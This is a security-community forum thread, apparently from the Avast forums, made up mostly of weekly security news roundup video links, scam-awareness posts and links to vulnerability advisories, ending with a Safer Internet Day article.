I am tired of Avast blocking my downloads from a number of sites because it says they contain URL blacklist. I have been using these sites for years, long before I used Avast, and they are legit sites. Now I have to disable Avast so I can download my files or updates to files or download other files from legit sites.
There should be an option to add the sites to a safe list
-
Can't find a thread to post this in so I will post here.
I am tired of Avast blocking my downloads from a number of sites because it says they contain URL blacklist. I have been using these sites for years, long before I used Avast, and they are legit sites. Now I have to disable Avast so I can download my files or updates to files or download other files from legit sites.
There should be an option to add the sites to a safe list
You should start your own 'new topic' as it is unique to you and your problem. This one is very active and you post will just get buried in the nearly 7000 posts.
Give some examples of the problem domain name/s only not active links (to avoid accidental exposure to suspect site/s), a screen shot attached to the post, with the Details option selected would be helpful.
-
Weekly Security News Roundup w/e 6-16-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/16/19/28/c01DquVBETz/preview.jpg)
https://youtu.be/Jq93nVNQe24 (https://youtu.be/Jq93nVNQe24)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Virus definition updates for Avast version 9/10/11 end in summer 2023
(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSz6UuRoeAXFFoVPtD88gCnxvD_TZu0CRaBQg&usqp=CAU)
https://blog.avast.com/virus-definition-updates-eol (https://blog.avast.com/virus-definition-updates-eol)
It's time to update that OUTDATED version.
-
Virus definition updates for Avast version 9/10/11 end in summer 2023
(https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSz6UuRoeAXFFoVPtD88gCnxvD_TZu0CRaBQg&usqp=CAU)
https://blog.avast.com/virus-definition-updates-eol (https://blog.avast.com/virus-definition-updates-eol)
It's time to update that OUTDATED version.
Interesting, I know someone i the forums that isn't going to like that (still on Avast 10) !
But what I'm unsure about is how the various different Avast program versions differ in the delivery of the virus definitions to make this necessary. Or are avast considering a new/different delivery system for updates or a major update of the VPS to perhaps give better detections or optimize them again.
I notice from the blog post that it is only offering information on how to update to the latest version. For many the reason they are using older versions is the operating system/computer they are using. Perhaps they need to consider making the off-line update for version 12 and above.
-
Weekly Security News Roundup WE 6-23-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/23/20/41/c010YpVgc43/preview.jpg)
https://youtu.be/Rmud9C55Lgc (https://youtu.be/Rmud9C55Lgc)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Avast Researchers Uncover Disturbing Crowdfunding Scheme
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/06/30/13/25/c01vITVgbQL/preview.jpg)
https://youtu.be/v3dR3Vgoogs (https://youtu.be/v3dR3Vgoogs)
The scam involves a series of emotionally charged video ads that are shared on YouTube and
Instagram. They hope you'll fall for the scam and donate.
My thanks to Emma McGowan for her article which you'll find at: https://tinyurl.com/23m5grbm (https://tinyurl.com/23m5grbm)
-
Weekly Security News Roundup w/e 6-30-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/01/16/46/c0iVDmVgqjh/preview.jpg)
https://youtu.be/ohPWQSR4kOE (https://youtu.be/ohPWQSR4kOE)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 7-7-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/07/19/19/c0iiqqVg4Oo/preview.jpg)
https://youtu.be/s194eWaRKjY (https://youtu.be/s194eWaRKjY)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 7-14-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/15/18/12/c0ioFlVgMNz/preview.jpg)
https://youtu.be/ZZ2Lx7q9gAc (https://youtu.be/ZZ2Lx7q9gAc)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Unmasking HotRat The hidden dangers in your software downloads
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/20/23/10/c0iY06Vk1Fq/preview.jpg)
https://youtu.be/KN9XfhiqRX4 (https://youtu.be/KN9XfhiqRX4)
Avast researchers have unmasked a sneaky little rat in illegal versions of cracked software.
His name is HotRat and he's coming for your personal info.
My thanks to Luis Corrons for his excellent article and the inspiration for this video.
You'll find his article at https://tinyurl.com/2jkpt67x (https://tinyurl.com/2jkpt67x)
-
Weekly Security News Roundup WE 7-21-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/22/15/20/c0i3oYVk6fy/preview.jpg)
https://youtu.be/XlZVZtTzP4E (https://youtu.be/XlZVZtTzP4E)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Don't Get Hooked - How to Spot Amazon Phishing Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/24/20/43/c0iZY5Vk20G/preview.jpg)
https://youtu.be/ddIRpuPE8zs (https://youtu.be/ddIRpuPE8zs)
Phishing scams are like a wolf in sheep's clothing.
Don't let the scammer take a bite out of you or your wallet.
-
Weekly Security News Roundup WE 7-28-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/28/13/46/c0iuImVkOft/preview.jpg)
https://youtu.be/yAKzPIHmhlE (https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/28/13/46/c0iuImVkOft/preview.jpg)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Cybersecurity for Dummies
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/07/29/16/57/c0iUDPVkt9e/preview.jpg)
https://youtu.be/voEjE0hzci0 (https://youtu.be/voEjE0hzci0)
A short tutorial directed at Cybersecurity Education.
I used a trial version of Slideoo ( https://slideoo.ai/ (https://slideoo.ai/) )
to aid in the creation of this video.
I made a lot of modification to the Slidoo creation but, it was helpful
and made the creation of the PowerPoint presentation easier.
I then used ZOOM and ScreenPal in converting the PowerPoint presentation
into a video.
This process does not alter or destroy the PowerPoint creation.
I simply use the PowerPoint presentation as the background image of the video.
-
eBooks are cheap, but you might pay in other ways
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/04/01/10/c0jfV6VkCv2/preview.jpg)
https://youtu.be/oNMmq2qeRPM (https://youtu.be/oNMmq2qeRPM)
Everyone is looking for a deal on textbooks this back-to-school season.
You know it, but so do the scammers. Here's what to look out for with eBook scams.
You'll find the Avast Blog entry at https://blog.avast.com/back-to-school-ebook-scams (https://blog.avast.com/back-to-school-ebook-scams)
-
Weekly Security News Roundup WE 8-4-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/04/19/25/c0jfqTVkELb/preview.jpg)
https://youtu.be/idedi7AQkV8 (https://youtu.be/idedi7AQkV8)
This week's important Security News gathered from many sources across the internet.
-
I've received several of these over the past few days.
The sender varies but the phishing attempt is the same.
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/08/22/00/c0jj3cVkM3d/preview.jpg)
If you get this, put it in the spam folder where it belongs.
-
New report shows surprising shift in cyber crime
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/09/19/48/c0jQqJVk8YP/preview.jpg)
https://youtu.be/L6e_7N2yVgo (https://youtu.be/L6e_7N2yVgo)
Something is changing in the world of cybersecurity.
Social engineering, and web-related threats, such as scams, phishing,
and malvertising, surged dramatically.
My thanks to Luis Corrons for this information.
You'll find his article at https://tinyurl.com/23h98zxj (https://tinyurl.com/23h98zxj)
-
Weekly Security News Roundup WE 8-11-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/11/21/17/c0jXrbVpc5z/preview.jpg)
https://youtu.be/EUCgKgruN8s (https://youtu.be/EUCgKgruN8s)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Deceptive World of Web-based Adware
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/15/19/58/c0joq9Vpj2m/preview.jpg)
https://youtu.be/I61Mj5NpVpA (https://youtu.be/I61Mj5NpVpA)
According to the Avast Q2 2023 Threat Report, it's evident that adware has made quite
a splash. My thanks to Emma McGowan for her informative article.
You can find her article at: https://tinyurl.com/2cpcvvud (https://tinyurl.com/2cpcvvud)
-
Weekly Security News Roundup WE 8-18-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/18/20/09/c0jFYQVpFq6/preview.jpg)
https://youtu.be/oVbOS3rbhXI (https://youtu.be/oVbOS3rbhXI)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Fleeceware drains your money slowly over time - Here is how to spot it
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/23/09/13/c0j0QIVpuMl/preview.jpg)
https://youtu.be/_0pm177a1YU (https://youtu.be/_0pm177a1YU)
Hidden somewhere among your charges could be an instance of fleeceware.
Today we’re going to look at the financial damage that legitimate and criminal
efforts can cause when we’re not paying attention to small charges.
My thanks to Emma McGowan of Avast for her article which you'll find at:
https://blog.avast.com/how-to-spot-fleeceware (https://blog.avast.com/how-to-spot-fleeceware)
-
Weekly Security News Roundup WE 8-25-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/25/21/13/c0jTrIVpAdj/preview.jpg)
https://youtu.be/BRBm_96iEmk (https://youtu.be/BRBm_96iEmk)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Triangulation Fraud - The Inside Scoop
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/08/26/01/51/c0jOV7VpBiD/preview.jpg)
https://youtu.be/kV46Y2IFOCs (https://youtu.be/kV46Y2IFOCs)
There’s a popular scheme that targets online shoppers.
But are you savvy enough to spot this scam?
Read Emma McGowans article which prompted this video at,
https://tinyurl.com/2a6wmhle (https://tinyurl.com/2a6wmhle)
-
Weekly Security News Roundup WE 9-1-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/02/07/54/c0QniLVpP0y/preview.jpg)
https://youtu.be/Q_v0sJsRbRE (https://youtu.be/Q_v0sJsRbRE)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 9-8-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/07/23/41/c0Qi0pVCXcE/preview.jpg)
https://youtu.be/ZO4stmk_G3k (https://youtu.be/ZO4stmk_G3k)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 9-15-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/16/11/22/c0QDX3VCzwp/preview.jpg)
https://youtu.be/hahOqHOWJj0 (https://youtu.be/hahOqHOWJj0)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Browser Push Notifications are on the rise
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/20/16/25/c0QYDTVCJ9W/preview.jpg)
https://youtu.be/G6yK8l3MCG8 (https://youtu.be/G6yK8l3MCG8)
Here is some timely and important information from Avast (https://blog.avast.com/tag/threat-research)
to help you control this latest increasing potential threat.
-
Hackers and scammers target classrooms with ransomware
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/20/21/31/c0QYrwVCdsf/preview.jpg)
https://youtu.be/0l2hpRVtLTM (https://youtu.be/0l2hpRVtLTM)
In the last few years, hackers have set their sights on an unexpected target:
our school districts and classrooms. Cybercriminals see educational institutions
as lucrative targets for fraud and scams.
My thanks to Emma McGowan for her excellent article which you can find at:
https://blog.avast.com/hackers-and-scammers-target-classrooms (https://blog.avast.com/hackers-and-scammers-target-classrooms)
-
Weekly Security News Roundup WE 9-22-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/22/13/43/c0Q3I5VC8VW/preview.jpg)
https://youtu.be/mYVOtE-nlyA (https://youtu.be/mYVOtE-nlyA)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
What is a Digital Identity - Updated
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/26/10/03/c0QO6eV5exV/preview.jpg)
https://youtu.be/w-4PmX0oK3E (https://youtu.be/w-4PmX0oK3E)
My thanks to Emma McGowan for the inspiration of this video.
You'll find her article at https://tinyurl.com/y3yphfwj (https://tinyurl.com/y3yphfwj)
-
Involved in a data breach - Here’s what you need to know
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/26/16/09/c0QODQV5fHf/preview.jpg)
https://youtu.be/UodmahIfMWg (https://youtu.be/UodmahIfMWg)
Here are some tips which will help you if you're involved in a data breach.
My thanks to Anna Branding for her article on this topic which appeared
on the Malwarebytes Blog.
You'll find her article at: https://tinyurl.com/2cr7tv88 (https://tinyurl.com/2cr7tv88)
-
RATs, rootkits, and ransomware
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/27/21/39/c0QtrgV5QMS/preview.jpg)
https://youtu.be/nm-YdRaFa0k (https://youtu.be/nm-YdRaFa0k)
Disturbing highlights from the latest Avast Threat Report indicate scammers
aren’t just stealing from your computer — they’re working to take it over entirely.
My thanks to Emma McGowan for her article and this video's inspiration.
You'll find her article at - https://tinyurl.com/29ah96mh (https://tinyurl.com/29ah96mh)
-
5 Social Security scams and how to avoid them
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/28/14/05/c0Qu2hV5lYB/preview.jpg)
https://youtu.be/aUECjY7toTg (https://youtu.be/aUECjY7toTg)
Scammers are constantly devising new ways to exploit this system for their gain,
putting your hard-earned retirement savings at risk.
I based this video on an article from Angelica Leicht.
Please read her full article at https://tinyurl.com/2dlmlpkx (https://tinyurl.com/2dlmlpkx)
-
Google fixes fifth actively exploited Chrome zero-day of 2023
https://www.bleepingcomputer.com/news/security/google-fixes-fifth-actively-exploited-chrome-zero-day-of-2023/
-
Weekly Security News Roundup WE 9-29-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/09/29/19/48/c0QUqJV5DSj/preview.jpg)
https://youtu.be/InrmGKq-6_g (https://youtu.be/InrmGKq-6_g)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Most dangerous vulnerability found in curl so far:
https://github.com/curl/curl/discussions/12026
On Wednesday 11th next a patch for CVE-2023-38545 will arrive.
polonus
-
Thousands of WordPress websites vulnerable through particular plug-in.
Re: https://blog.sucuri.net/2023/10/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins.html
polonus
-
Weekly Security News Roundup WE 10-13-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/13/20/20/c06IYYV5R5k/preview.jpg)
https://youtu.be/8Iu5tcU9s6E (https://youtu.be/8Iu5tcU9s6E)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Approx. 200.000 WordPress websites warned against a threat, websites vulnerable since August last.
Read: https://www.wordfence.com/blog/2023/10/psa-critical-unauthenticated-arbitrary-file-upload-vulnerability-in-royal-elementor-addons-and-templates-being-actively-exploited/ (source - Chloe Chamberland - Oct. 13 last)
polonus
-
Your next online dating match might actually be ChatGPT
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/17/19/19/c06bqqVEipk/preview.jpg)
https://youtu.be/OrZF1uVrlHI (https://youtu.be/OrZF1uVrlHI)
Researchers at Avast have uncovered a romance scam that utilizes
ChatGPT to increase the believability of their online dating conversations.
My thanks to Luis Corrons for his article on this topic. You'll find the article at:
https://blog.avast.com/your-next-online-dating-match-might-actually-be-chatgpt (https://blog.avast.com/your-next-online-dating-match-might-actually-be-chatgpt)
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/18/14/15/c06F2oVE6OF/preview.jpg)
-
Cybercriminals are using AI tools to make phishing easier
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/18/22/36/c06F3zVEXP8/preview.jpg)
https://youtu.be/jBc_mX_VSz0 (https://youtu.be/jBc_mX_VSz0)
Humans are still king when it comes to writing convincing phishing emails—but generative AI tools
could be making it easier for attackers to automate customized phishing campaigns at scale.
My thanks to TOM MCKAY of IT Brew for his article and the inspiration of this video.
You'll find his article at - https://tinyurl.com/yty7kcbb (https://tinyurl.com/yty7kcbb)
-
Phishing - The big nemesis
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/19/07/30/c06qivVEIho/preview.jpg)
https://youtu.be/KYAjz9_6oiU (https://youtu.be/KYAjz9_6oiU)
Phishing - There are several types. Don't become a victim. Avast can help!
https://www.avast.com/en-us/free-antivirus-download#pc (https://www.avast.com/en-us/free-antivirus-download#pc)
-
Here's another candidate for the SPAM folder:
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/19/08/11/c06qjXVEIlg/preview.jpg)
-
Weekly Security News Roundup WE 10-20-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/20/15/24/c06YoZVEF29/preview.jpg)
https://youtu.be/1ge2y6wwbPM (https://youtu.be/1ge2y6wwbPM)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
How to avoid package-delivery scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/23/20/39/c060YgVETvM/preview.jpg)
https://youtu.be/9G0jGpDGH2Q (https://youtu.be/9G0jGpDGH2Q)
The number of people who shop online rose to 2.64 billion worldwide.
That's equal to 33.3% of the globe's population.
My thanks to Dan Rafter for his informative article and the inspiration for this video.
You'll find his article at https://tinyurl.com/yqojuohf (https://tinyurl.com/yqojuohf)
-
Phishing - What is it and how can you avoid it
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/26/23/10/c06O06VEAtP/preview.jpg)
https://youtu.be/cqm6NxVZBiA (https://youtu.be/cqm6NxVZBiA)
Phishing attacks can come in the form of emails, text messages, or phone calls.
The more you know about phishing attacks, the better equipped you will be to
spot and avoid them.
-
Weekly Security News Roundup WE 10-27-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/28/01/59/c06uVRVEpIQ/preview.jpg)
https://youtu.be/QErOjURqQlM (https://youtu.be/QErOjURqQlM)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Protecting Yourself from AI Generated Cybercrime
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/01/22/27/c0XV3tVELJ6/preview.jpg)
https://youtu.be/dRcvvKBBppc (https://youtu.be/dRcvvKBBppc)
Cybercriminals are increasingly using AI to enhance the effectiveness of their attacks.
-
12 holiday scams to watch out for in 2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/02/23/12/c0Xn0lVE9U4/preview.jpg)
https://youtu.be/BaltYeB1RKY (https://youtu.be/BaltYeB1RKY)
Tis the season to use common sense and reason.
You'll find additional tips and information on this topic at:
https://tinyurl.com/ykbu52vu (https://tinyurl.com/ykbu52vu)
-
Weekly Security News Roundup WE 11-3-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/03/21/24/c0XerZVEWHd/preview.jpg)
https://youtu.be/yCeo8bbXF68 (https://youtu.be/yCeo8bbXF68)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Holiday Scams - Your Essential Guide
https://bob3160.blogspot.com/2023/11/holiday-scams-your-essential-guide.html (https://bob3160.blogspot.com/2023/11/holiday-scams-your-essential-guide.html)
-
Weekly Security News Roundup WE 11-10-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/10/19/00/c0X6qcVGYgM/preview.jpg)
https://youtu.be/3tnlB13PaEY (https://youtu.be/3tnlB13PaEY)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
600.000 word press sites still vulnerable:
https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
polonus
-
Weekly Security News Roundup WE 11-17-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/17/22/43/c0Xb35VGpgs/preview.jpg)
https://youtu.be/aNren1bJ4LI (https://youtu.be/aNren1bJ4LI)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
10 Safety tips for safe online-shopping
on Black Friday and Cyber Monday
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/20/23/05/c0XY0hVGJQ4/preview.jpg)
https://youtu.be/4GPYjdgOriU (https://youtu.be/4GPYjdgOriU)
The holiday season is upon us, and with it comes the excitement
of Black Friday and Cyber Monday.
Follow these tips to enjoy your shopping while staying safe.
My thanks to Emma McGowan for her article on this topic
Read her article at: https://tinyurl.com/ymj39b4t (https://tinyurl.com/ymj39b4t)
-
Weekly Security News Roundup WE 11-24-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/24/23/34/c0XZ04VGWUL/preview.jpg)
https://youtu.be/5wpdsbzLtNU (https://youtu.be/5wpdsbzLtNU)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Associated Press, ESPN, CBS among top sites serving fake virus alerts
https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts
-
Weekly Security News Roundup WE 12-1-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/01/22/09/c0lV3QVmYHu/preview.jpg)
https://youtu.be/0LRPN0tZenM (https://youtu.be/0LRPN0tZenM)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
@Pondus,
Both of your entries along with others are part of my roundup. Not because I found them here
but, we are probably following the same sources and I only do the roundup weekly. Thanks.
-
Re: https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/
polonus
-
Weekly Security News Roundup WE 12-8-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/09/16/19/c0lQDqVmE0L/preview.jpg)
https://youtu.be/7RNacrJm9Ds (https://youtu.be/7RNacrJm9Ds)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Android phones can be taken over remotely – update when you can
https://www.malwarebytes.com/blog/news/2023/12/android-phones-can-be-taken-over-remotely-update-when-you-can
-
Weekly Security News Roundup WE 12-15-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/15/14/15/c0lo2oVHVaV/preview.jpg)
https://youtu.be/XLlmLfE2ZPo (https://youtu.be/XLlmLfE2ZPo)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Avast Phishing Awards
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/20/20/51/c0lYY7VH2g4/preview.jpg)
https://youtu.be/TqkgBwPApFM (https://youtu.be/TqkgBwPApFM)
Welcome to the most prestigious event in the world of cyber trickery.
The first annual Avast Phishing Awards!
My thanks to Emma McGowan for sharing this information.
You can find her article on the Avast Blog at: http://tinyurl.com/yss2s6w5 (http://tinyurl.com/yss2s6w5)
-
Weekly Security News Roundup WE 12-22-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/22/14/22/c0l323VHq57/preview.jpg)
https://youtu.be/3a0ISilRDuQ (https://youtu.be/3a0ISilRDuQ)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Very actual again protect against skimming your online payments by cybercriminals, read:
https://www.techrepublic.com/article/magecart-attack-what-it-is-how-it-works-and-how-to-prevent-it/
Use a good javascript blocker and SafetoOpen Online Security extension, when paying for your goods at a webshop-cart-service.
polonus
-
Twas the day after Christmas
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/26/16/25/c0lODTVH0Sc/preview.jpg)
https://youtu.be/8aQLxmX-0_s (https://youtu.be/8aQLxmX-0_s)
A post-holiday poem for the digital age we should all follow.
Thanks to the Avast Blog for this information.
https://blog.avast.com/day-after-christmas-digital-age-poem (https://blog.avast.com/day-after-christmas-digital-age-poem)
-
Weekly Security News Roundup WE 12-29-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/29/13/19/c0lUIqVHvFb/preview.jpg)
https://youtu.be/Qg7DA5lnsHw (https://youtu.be/Qg7DA5lnsHw)
This week's important Security News gathered from many sources across the internet.
Since this is the final installment of 2023, I've also included a recap of the
most dangerous Cyber threats we encountered during 2023.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-5-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/05/20/26/cZVhYOVHG8w/preview.jpg)
https://youtu.be/K746sFRkZb4 (https://youtu.be/K746sFRkZb4)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-12-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/13/00/04/cZVIcfVJhl2/preview.jpg)
https://youtu.be/FXYZXzNFMck
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-19-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/20/17/39/cZVYbgVJtVJ/preview.jpg)
https://youtu.be/T0Npq19Z-W4 (https://youtu.be/T0Npq19Z-W4)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
How to avoid Facebook Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/22/22/30/cZV33vVJxJJ/preview.jpg)
https://youtu.be/B8fQYuEOtsg (https://youtu.be/B8fQYuEOtsg)
Last week I reported on the “I’ll miss him so much” Facebook scam" in my
Weekly Security News Roundup - https://bit.ly/SecurityNewsRoundup (https://bit.ly/SecurityNewsRoundup)
I thought it was time to post some advice on avoiding Scams on Facebook.
I hope this helps.
I used Copilot and Pictory.ai to create the video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Simple advice to follow to prevent
becoming a victim of Identity Theft
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/26/00/04/cZVOcfVJE90/preview.jpg)
https://youtu.be/HXV6PgsCfD8 (https://youtu.be/HXV6PgsCfD8)
Identity Theft Awareness Week 2024 starts on January 29.
The following information is offered to help you avoid becoming a victim.
See the video show notes for additional references.
My thanks to Emma McGowan for her informative article which prompted this video.
You'll find her article on the Avast Blog at: https://bit.ly/3Ugd2fI (https://bit.ly/3Ugd2fI)
I used Pictory.ai in creating this video: https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Weekly Security News Roundup WE 1-26-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/26/20/00/cZVOYcVJHyO/preview.jpg)
https://youtu.be/Z86p-3YAW2A (https://youtu.be/Z86p-3YAW2A)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
Check if you're affected by the Mega Breach: https://cybernews.com/personal-data-leak-check/ (https://cybernews.com/personal-data-leak-check/)
-
Today's Digital Battlefield -
How AI is Protecting Us from Cybercrime
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/31/21/14/cZVwr2VdczY/preview.jpg)
https://youtu.be/eY73wMPgr_c (https://youtu.be/eY73wMPgr_c)
The battle against cybercrime is a continuous one, but AI offers a beacon of hope.
By understanding the diverse threats and leveraging the power of AI, we can build
a more secure digital future, one byte at a time. Remember, while AI is a powerful tool,
it's crucial to practice safe online habits like using a reputable Antivirus,
strong passwords and being cautious about suspicious links and emails.
I used AI (Bard) and Pictory.ai to create the video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
I used Microsoft Designer to create some of the images used in this video.
-
AI and Deepfake Porn - Nothing New
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/01/16/04/cZnVDfVdeAx/preview.jpg)
https://youtu.be/jGN5wpW_pqs
After AI-generated pornographic images of Taylor Swift went viral on X,
we're left asking: What does this mean for the future of AI?
My thanks to Emma McGowan for her article and Avast's Threat Intelligence Director,
Michal Salát for his expertise in providing this insight on an important although disturbing topic.
Read Emma's article on the Avast Blog at: https://bit.ly/3ufZFBp (https://bit.ly/3ufZFBp)
I used Pictory.ai to create the video. https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Weekly Security News Roundup WE 2-2-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/03/00/11/cZnecXVdjAx/preview.jpg)
https://youtu.be/xY1oEZaCrQQ (https://youtu.be/xY1oEZaCrQQ)
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Phishing Frenzy - Don't Be the Catch
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/05/15/00/cZnhocVdIGP/preview.jpg)
https://youtu.be/SPDCG_zSIoQ (https://youtu.be/SPDCG_zSIoQ)
By using the tools and knowledge provided in this guide,
you can navigate the digital world with confidence,
leaving the phishers floundering in your wake.
I used Copilot and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o (https://pictory.ai?ref=t015o)
-
Safer Internet Day: Navigating the Digital World with Care
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/06/14/34/cZn124VdbMo/preview.jpg)
In the vast expanse of the digital universe, Safer Internet Day stands as a beacon of awareness, guiding netizens towards a more secure and positive online experience. Celebrated globally in February, this day is a call to action for everyone to contribute to a safer internet, particularly for the younger generation.
What is Safer Internet Day?
Initiated in Europe in 2003 and now observed in over 100 countries, Safer Internet Day is a community-led effort to promote responsible, respectful, and creative use of technology¹². It's a day dedicated to empowering users, especially children and young people, to navigate the internet safely.
Why is it Important?
The internet is a double-edged sword; while it offers immense knowledge and connectivity, it also poses risks like cyberbullying, fraud, and exposure to inappropriate content. Safer Internet Day emphasizes education and dialogue about online safety to protect users from these dangers.
Steps Towards a Safer Internet - Here are a few pointers to foster a safer digital environment:
Educate and Engage: Talk to children about the potential risks online and encourage them to share their internet experiences.
Use Privacy Settings: Adjust privacy settings on social media and other platforms to control who sees your information.
Strong Passwords: Create complex passwords and change them regularly to secure your accounts.
